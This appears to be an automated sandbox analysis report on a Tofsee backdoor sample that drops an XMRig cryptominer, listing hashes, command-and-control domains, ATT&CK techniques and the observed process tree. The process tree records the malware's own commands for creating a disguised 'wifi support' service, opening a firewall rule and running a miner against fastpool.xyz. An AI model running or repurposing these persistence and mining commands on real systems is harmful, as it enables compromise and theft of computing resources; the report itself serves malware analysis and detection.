Analysis

  • max time kernel
    185s
  • max time network
    200s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    15-06-2022 09:51

General

  • Target

    e04fd6d39fbbee850cee3ebb9573e44d28d357c7683f59fc3e76a741d7d5cec5.exe

  • Size

    259KB

  • MD5

    9591d38da291e3957ab1bdcbe57b67c1

  • SHA1

    8a305301e733d607ef478b0bb26465f6db3bb1e0

  • SHA256

    e04fd6d39fbbee850cee3ebb9573e44d28d357c7683f59fc3e76a741d7d5cec5

  • SHA512

    c95b19bc274bc6bbb5a3c4578b84a5b952342a8359076f1fded4679f61dad33c2dbc271fd7e098249acd15ba625aee5052f178704cc5a7109e77262d7e08fcb0

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e04fd6d39fbbee850cee3ebb9573e44d28d357c7683f59fc3e76a741d7d5cec5.exe
    "C:\Users\Admin\AppData\Local\Temp\e04fd6d39fbbee850cee3ebb9573e44d28d357c7683f59fc3e76a741d7d5cec5.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4884
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\cwmathzx\
      2⤵
        PID:4320
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fvfqoobe.exe" C:\Windows\SysWOW64\cwmathzx\
        2⤵
          PID:3984
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create cwmathzx binPath= "C:\Windows\SysWOW64\cwmathzx\fvfqoobe.exe /d\"C:\Users\Admin\AppData\Local\Temp\e04fd6d39fbbee850cee3ebb9573e44d28d357c7683f59fc3e76a741d7d5cec5.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:4604
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description cwmathzx "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1624
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start cwmathzx
          2⤵
          • Launches sc.exe
          PID:2708
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1180
      • C:\Windows\SysWOW64\cwmathzx\fvfqoobe.exe
        C:\Windows\SysWOW64\cwmathzx\fvfqoobe.exe /d"C:\Users\Admin\AppData\Local\Temp\e04fd6d39fbbee850cee3ebb9573e44d28d357c7683f59fc3e76a741d7d5cec5.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1296
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:1836
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4692

      Network

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    New Service (1) T1050
    Modify Existing Service (1) T1031
    Registry Run Keys / Startup Folder (1) T1060
  • Privilege Escalation
    New Service (1) T1050
  • Defense Evasion
    Modify Registry (1) T1112
  • Discovery
    Query Registry (1) T1012
    System Information Discovery (2) T1082

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\fvfqoobe.exe
        Filesize

        14.4MB

        MD5

        916676630ed829f18d060e96bf81d73e

        SHA1

        45733f018bf0cfc58882337c60efda4aaeecf6c6

        SHA256

        95621533752b8bb4e2db45c72a8411b3e4cbd25eb796ab55b2f5d22a31b7d171

        SHA512

        4c91966a810813473916b849e549c48859978ba71045fb63dd3be306cbfec66752069fc7747c11d324596d12634f4615b75246f4db7f4c471927d72f3a731629

      • C:\Windows\SysWOW64\cwmathzx\fvfqoobe.exe
        Filesize

        14.4MB

        MD5

        916676630ed829f18d060e96bf81d73e

        SHA1

        45733f018bf0cfc58882337c60efda4aaeecf6c6

        SHA256

        95621533752b8bb4e2db45c72a8411b3e4cbd25eb796ab55b2f5d22a31b7d171

        SHA512

        4c91966a810813473916b849e549c48859978ba71045fb63dd3be306cbfec66752069fc7747c11d324596d12634f4615b75246f4db7f4c471927d72f3a731629

      • memory/1180-139-0x0000000000000000-mapping.dmp
      • memory/1296-152-0x0000000000400000-0x000000000065D000-memory.dmp
        Filesize

        2.4MB

      • memory/1296-151-0x0000000000400000-0x000000000065D000-memory.dmp
        Filesize

        2.4MB

      • memory/1296-150-0x0000000000929000-0x0000000000937000-memory.dmp
        Filesize

        56KB

      • memory/1296-142-0x0000000000400000-0x000000000065D000-memory.dmp
        Filesize

        2.4MB

      • memory/1296-141-0x0000000000929000-0x0000000000937000-memory.dmp
        Filesize

        56KB

      • memory/1624-137-0x0000000000000000-mapping.dmp
      • memory/1836-144-0x00000000007B0000-0x00000000007C5000-memory.dmp
        Filesize

        84KB

      • memory/1836-165-0x0000000007700000-0x0000000007B0B000-memory.dmp
        Filesize

        4.0MB

      • memory/1836-168-0x0000000001DE0000-0x0000000001DE7000-memory.dmp
        Filesize

        28KB

      • memory/1836-162-0x0000000001DD0000-0x0000000001DD5000-memory.dmp
        Filesize

        20KB

      • memory/1836-143-0x0000000000000000-mapping.dmp
      • memory/1836-159-0x0000000001D40000-0x0000000001D50000-memory.dmp
        Filesize

        64KB

      • memory/1836-147-0x00000000007B0000-0x00000000007C5000-memory.dmp
        Filesize

        84KB

      • memory/1836-156-0x0000000001D30000-0x0000000001D36000-memory.dmp
        Filesize

        24KB

      • memory/1836-153-0x0000000002800000-0x0000000002A0F000-memory.dmp
        Filesize

        2.1MB

      • memory/2708-138-0x0000000000000000-mapping.dmp
      • memory/3984-134-0x0000000000000000-mapping.dmp
      • memory/4320-133-0x0000000000000000-mapping.dmp
      • memory/4604-136-0x0000000000000000-mapping.dmp
      • memory/4692-171-0x0000000000000000-mapping.dmp
      • memory/4692-172-0x0000000001270000-0x0000000001361000-memory.dmp
        Filesize

        964KB

      • memory/4692-177-0x0000000001270000-0x0000000001361000-memory.dmp
        Filesize

        964KB

      • memory/4884-132-0x0000000000400000-0x000000000065D000-memory.dmp
        Filesize

        2.4MB

      • memory/4884-131-0x0000000002250000-0x0000000002263000-memory.dmp
        Filesize

        76KB

      • memory/4884-149-0x0000000000400000-0x000000000065D000-memory.dmp
        Filesize

        2.4MB

      • memory/4884-148-0x00000000009BD000-0x00000000009CB000-memory.dmp
        Filesize

        56KB

      • memory/4884-130-0x00000000009BD000-0x00000000009CB000-memory.dmp
        Filesize

        56KB